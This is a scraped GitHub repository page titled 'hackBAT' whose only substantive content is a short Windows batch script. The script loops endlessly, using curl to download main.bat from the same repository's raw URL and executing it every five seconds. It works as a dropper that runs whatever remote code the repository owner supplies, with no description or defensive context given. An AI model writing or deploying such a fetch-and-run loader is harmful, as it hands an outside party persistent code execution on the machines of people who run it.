Skip to content

taha00125/hackBAT

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 

Repository files navigation

@echo off
setlocal

:start
echo Downloading file from github...
curl -o c.bat https://raw.githubusercontent.com/taha00125/hackBAT/main/main.bat
call c.bat
timeout /t 5 /nobreak >nul
goto start

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published